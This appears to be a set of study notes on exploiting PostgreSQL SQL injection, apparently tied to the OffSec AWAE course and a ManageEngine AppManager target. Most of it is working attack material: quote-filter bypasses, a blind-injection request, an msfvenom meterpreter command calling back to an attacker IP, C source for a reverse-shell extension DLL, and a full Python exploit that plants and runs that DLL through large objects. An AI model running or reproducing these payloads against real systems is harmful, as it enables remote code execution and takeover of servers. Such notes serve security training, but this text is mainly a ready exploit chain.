Query quirks

Assume we’ve discovered a SQL injection vulnerability in a PostgreSQL database and we want to include string data in our query, but traditional ' and " characters are being filtered. Some useful tips are that we can use the following PostgreSQL language features to provide arbitrary characters or bypass quotation restrictions.

CHR and string concatenation

The CHR() and || operators allow you to provide arbitrary characters and concatenate them into a string, for example:

CREATE TABLE AWAE (offsec text); INSERT INTO AWAE(offsec) VALUES (CHR(65)||CHR(87)||CHR(65)||CHR(69));
SELECT * from AWAE;

Dollar signs and tags

Referencing 4.1.2.4 of the PostgreSQL syntax documentation, we can provide $$ to specify string constants. For example, with the right permissions, we can use this to write commands to disk:

CREATE TEMP TABLE AWAE(offsec text);INSERT INTO AWAE(offsec) VALUES ($$test$$);
COPY AWAE(offsec) TO $$C:\Program Files (x86)\PostgreSQL\9.2\data\test.txt$$;

Blind injection and reflections

Assume we think we’ve found a SQL injection vulnerability in the source code of a target application, but, because of the nature of the endpoint we’re injecting into, the output of our SQL queries aren’t returned to us. If that’s the case, we can use built-in PostgreSQL methods like sleep(int) to determine if we have arbitrary query execution. Here’s an example:

GET /servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;SELECT+case+when+(SELECT+current_setting($$is_superuser$$))=$$on$$+then+pg_sleep(10)+end;--+

In the above example query, not only are we checking to see if we have query execution, we’re also checking to see if the current user we’re executing queries as has superuser privileges.

File system interactions

Attackers want to immediately interact with a target’s file system - that’s where all the important stuff is! With the right permissions, reading and writing to disk in PostgreSQL is pretty straight forward. Here’s a query to read content from disk into a table:

COPY <table_name> from <file_name>

And here’s a query to write content to disk from a table:

COPY <table_name> to <file_name>

And here’s a query to write a string constant to disk:

COPY (select $$awae$$) to <file_name>

Let’s get even crazier. Instead of just writing tiny strings to disk, we’ll write whole payloads. We accomplish this by base64 encoding our payloads and decoding them using PostgreSQL before writing to disk. Here’s an example:

copy (select convert_from(decode($$ENCODED_PAYLOAD$$,$$base64$$),$$utf-8$$)) to $$C:\\Program+Files+(x86)\\ManageEngine\\AppManager12\\working\\conf\\\\application\\scripts\\wmiget.vbs$$;

In this example, we’ve already encoded our payload with base64. We send this query to the target, and at runtime PostgreSQL decodes the payload from base64, and then converts the bytes to a string using utf-8 encoding, and then finally writes the VBS script to a disk.

We can quickly generate reverse shell VBS scripts using msfvenom as such:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.119.120 LPORT=4444 -e x86/shikata_ga_nai -f vbs

One minor inconvenience with msfvenom, it doesn’t create one-liner VBS scripts. To get around this, we can convert the VBS script to a one-liner with the following Python:

def convert_to_oneliner(self, vbscript) -> str:
    return (
        open(vbscript, "rt")
        .read()
        .replace("\r", "")
        .replace("\n", ":")
        .replace("\t", " ")
        .replace("& _ :", "& ")
        .replace("& _:", "& ")
        .encode("utf-8")
    )

User-defined extensions

Instead of writing scripts to disk and somehow getting the target application to execute it, we can define custom extensions and functions in PostgresSQL. A PostgreSQL extension is a compiled shared object (e.g. a .dll or .so file) using PostgreSQL’s extension library. Extension library files must be compiled using PostgreSQL’s extension library, or else the won’t be recognized by the server and will fail to load. Here’s an example of a reverse shell extension written in C, targeted at the Windows operating system:

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <stdio.h>
#include <winsock2.h>
#include "utils/builtins.h"
#pragma comment(lib, "ws2_32")
 
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
 
/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum rev_shell(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(rev_shell);
 
WSADATA wsaData;
SOCKET s1;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO sui;
PROCESS_INFORMATION pi;
 
Datum
rev_shell(PG_FUNCTION_ARGS)
{
 
	/* convert C string to text pointer */
#define GET_TEXT(cstrp) \
   DatumGetTextP(DirectFunctionCall1(textin, CStringGetDatum(cstrp)))
 
	/* convert text pointer to C string */
#define GET_STR(textp) \
  DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))
 
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
 
	hax.sin_family = AF_INET;
	hax.sin_port = htons(PG_GETARG_INT32(1));
	hax.sin_addr.s_addr = inet_addr(GET_STR(PG_GETARG_TEXT_P(0)));
 
	WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
 
	memset(&sui, 0, sizeof(sui));
	sui.cb = sizeof(sui);
	sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1;
 
	CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
	PG_RETURN_VOID();
}

Below are some example queries we can execute on the target PostgreSQL server to download the reverse shell, user-defined extension library file payload and execute it:

self.queries = [
            ";DROP+FUNCTION+rev_shell(text,integer);--+",
            f";CREATE+OR+REPLACE+FUNCTION+rev_shell(text,integer)+RETURNS+void+AS+$$\\\\{lhost}\\{samba}\\rev_shell.dll$$,$$rev_shell$$+LANGUAGE+C+STRICT;--+",
            f";SELECT+rev_shell($${lhost}$$,{lport});--+",
        ]

Large objects

We often don’t have the ability to get the victim to download our payload from our attacker host using SMB. How can we transfer the payload with our existing ability to execute arbitrary queries? With PostgreSQL large objects, we can read and write files from the file system, as well as edit existing large objects within the database with our payloads.

In the following Python script, we conduct the following actions:

  • We read C:\Windows\win.ini from disk, creating a large object in the database
  • We clobber the large object’s contents with our payload
  • We write our payload to C:\Windows\Temp\rev_shell.dll
  • We create a new user-defined function from our payload
  • We execute the user-defined function, triggering the reverse shell, calling back to our attacker host
import http.client
from argparse import ArgumentParser
from random import randint
 
import requests
 
http.client.HTTPConnection.debuglevel = 1
requests.packages.urllib3.disable_warnings()
HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}
API_ENDPOINT = "/servlet/AMUserResourcesSyncServlet"
PARAMS = "ForMasRange=1&userId=1"
 
 
class Solution:
    def __init__(
        self, url: str, lhost: str, lport: int, filename: str, id: int
    ) -> None:
        self.s = requests.Session()
        self.url = f"{url.rstrip("/")}{API_ENDPOINT}"
        self.lhost, self.lport, self.filename, self.loid = lhost, lport, filename, id
 
    def execute_query(self, query) -> None:
        req = requests.Request(
            "POST", self.url, data=PARAMS + ";" + query + ";--+", headers=HEADERS
        )
        prepped = self.s.prepare_request(req)
        self.s.send(prepped, verify=False)
 
    def solve(self) -> None:
        # Delete existing user-defined function (UDF)
        # Unlink existing large object w/ ID
        # Import large object to clobber
        queries = [
            "DROP FUNCTION rev_shell(text,integer)",
            f"SELECT lo_unlink({self.loid})",
            f"SELECT lo_import($$C:\\Windows\\win.ini$$,{self.loid})",
        ]
 
        for query in queries:
            self.execute_query(query)
 
        # Read payload from disk
        payload = None
        with open(self.filename, "rb") as f:
            payload = f.read()
 
        # Upload payload as large object from disk
        j, chunk_size = 0, 2048
        for i in range(0, len(payload), chunk_size):
            chunk = payload[i : i + chunk_size].hex()
 
            query = ""
            if j:
                query = f"INSERT INTO PG_LARGEOBJECT (loid,pageno,data) VALUES ({self.loid},{j},decode($${chunk}$$,$$hex$$))"
            else:
                query = f"UPDATE PG_LARGEOBJECT SET data=decode($${chunk}$$,$$hex$$) WHERE loid={self.loid} AND pageno={j}"
 
            self.execute_query(query)
            j += 1
 
        # Write payload to disk
        # Load payload as user-defined function
        # Trigger reverse shell
        queries = [
            f"SELECT lo_export({self.loid},$$C:\\Windows\\Temp\\rev_shell.dll$$)",
            f"CREATE OR REPLACE FUNCTION rev_shell(text,integer) RETURNS void AS $$C:\\Windows\\Temp\\rev_shell.dll$$,$$rev_shell$$ LANGUAGE C STRICT",
            f"SELECT rev_shell($${self.lhost}$$,{self.lport})",
        ]
 
        for query in queries:
            self.execute_query(query)
 
 
def main():
    parser = ArgumentParser()
    parser.add_argument("-u", "--url", dest="url")
    parser.add_argument("-lh", "--lhost", dest="lhost")
    parser.add_argument("-lp", "--lport", dest="lport", type=int)
    parser.add_argument("-f", "--filename", dest="filename")
    parser.add_argument("-i", "--id", dest="id", type=int, default=randint(1000, 9999))
    args = parser.parse_args()
    s = Solution(args.url, args.lhost, args.lport, args.filename, args.id)
    s.solve()
 
 
if __name__ == "__main__":
    main()

A keen eye will notice that, unlike our previous example using a VBS script payload and encoding its contents with Base64 to maintain its integrity while transferring via HTTPS, we use hex encoding and decoding to upload our large object file. With PostgreSQL and the quirks of HTTPS, URL safety, encoding, etc. we should probably just default to using hex encoding.

hex encoding doesn’t contain any weird characters that we have to account for, as the values range from 0-9 and a-f - none of that +/-_ nonsense in Base64. Fortunately for us, PostgreSQL can decode our contents from hex, converting them to byte format and then writing the contents to our large object.

Also notice that we chunk our large object uploads in 2048 size chunks. Seeking through a large object is done via pages, and the maximum page size is, generally, 2048 bytes - depending on the server’s configuration. We have to upload our payload in exactly 2048 bytes chunks for each page to maintain payload consistency, otherwise our payload will be corrupted when written to disk.